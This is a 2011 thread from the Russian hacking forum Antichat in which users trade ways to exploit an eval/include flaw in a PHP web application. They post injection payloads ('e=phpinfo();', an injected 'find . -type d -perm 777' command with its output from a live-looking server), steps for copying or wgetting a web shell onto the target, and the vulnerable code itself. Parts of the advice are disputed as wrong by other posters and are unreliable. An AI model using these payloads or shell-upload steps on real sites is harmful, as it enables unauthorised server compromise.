ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.09.2011, 12:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от VertuOzz
VertuOzz said:
Извиняюсь за нубский вопрос, а что это даст?
это может дать тебе возможность выполнять пхп код, т.е если в том месте где ты вставил эту строчку срабодает пхп инфо которое можешь вызвать так "e=phpinfo();" то значит можешь удаленно попробовать залить шелл примерно так "e=cp("/folder/shell.php","http://localhost/shell.txt");" ну или на месте самой этой строчки вставить код уплодера, вообщем вариантов куча)
|
|
|
14.09.2011, 16:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
1470
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
это может дать тебе возможность выполнять пхп код, т.е если в том месте где ты вставил эту строчку срабодает пхп инфо которое можешь вызвать так "e=phpinfo();" то значит можешь удаленно попробовать залить шелл примерно так "e=cp("/folder/shell.php","http://localhost/shell.txt");" ну или на месте самой этой строчки вставить код уплодера, вообщем вариантов куча)
А можно через cmd залить?
На команду
Код:
Code:
find . -type d -perm 777 -print
ругнулся
Код HTML:
HTML:
Warning: include_once() [function.include]: Failed opening 'modules/error_reporting(0);print `find . -type d -perm 777 -print`;///error_reporting(0);print `find . -type d -perm 777 -print`;//.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/public_html/includes/libs/ss.inc.php on line 168
но выдал все папки с правами на записью Какой командой можно залить файл, удаленно или локально?
|
|
|
|
14.09.2011, 17:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
10040
Репутация:
7
|
|
Сообщение от winstrool
winstrool said:
"e=cp("/folder/shell.php","http://localhost/shell.txt");"
Херню не неси
|
|
|
|
14.09.2011, 18:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от sourcec0de
sourcec0de said:
Херню не неси
Есле херня, аргументируй!!! в чем имено,
cp - это функция копирования, линукса, онаже COPY на пхп, а как вы ее будите использовать это уже другой вопрос, требую аргументировать в чем херня!
|
|
|
|
14.09.2011, 18:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
10040
Репутация:
7
|
|
Сообщение от winstrool
winstrool said:
Есле херня, аргументируй!!! в чем имено,
cp - это функция копирования, линукса, онаже COPY на пхп, а как вы ее будите использовать это уже другой вопрос, требую аргументировать в чем херня!
Сначала пишешь вставить эвал, а потом юзаешь системные команды(непосресдтвенно через эвал), да еще и с неправильными аргументами...
|
|
|
|
14.09.2011, 18:07
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от VertuOzz
VertuOzz said:
А можно через cmd залить?
На команду
Код:
Code:
find . -type d -perm 777 -print
ругнулся
Код HTML:
HTML:
Warning: include_once() [function.include]: Failed opening 'modules/error_reporting(0);print `find . -type d -perm 777 -print`;///error_reporting(0);print `find . -type d -perm 777 -print`;//.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/public_html/includes/libs/ss.inc.php on line 168
но выдал все папки с правами на записью Какой командой можно залить файл, удаленно или локально? если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp "
|
|
|
|
14.09.2011, 18:13
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от winstrool
winstrool said:
если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp "
system \ passthru \ etc => system("cp ");
Но никак не просто в eval въебать cp.
Может все-таки не будешь пугать людей?
|
|
|
|
14.09.2011, 18:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
10040
Репутация:
7
|
|
Сообщение от winstrool
winstrool said:
ей и попробуй если через пхп то copy("куда", "откуда");,
И опять бред, ты я смотрю главный распространитель дезинформации тут.
|
|
|
|
14.09.2011, 18:16
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp "
Это LFI, и произвольное выполнение кода(Не команд).
P.S. Писать не хотел, так как это элементарно, но winstrool попросил разобраться.
|
|
|
|
14.09.2011, 18:25
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от XAMEHA
XAMEHA said:
Это LFI, а не произвольное выполнение кода/команд.
P.S. Писать не хотел, так как это элементарно, но
winstrool
попросил разобраться.
Это и произвольное выполнение кода и LFI. Но мне кажется, что "произвольное выполнение кода" как-то выгоднее нежели LFI, да и говорим мы не о LFI сейчас.
/showpost.php?p=2829300&postcount=18023
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'attachment'[/COLOR][COLOR="#007700"]];
...
include_once([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
...
[/COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'::ajax_post();'[/COLOR][COLOR="#007700"];
...
eval([/COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//EVAL!!1111 Code Execution
[/COLOR][/COLOR]
Писать не хотел, так как это элементарно, но Расмус Лердорф попросил разобраться.
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
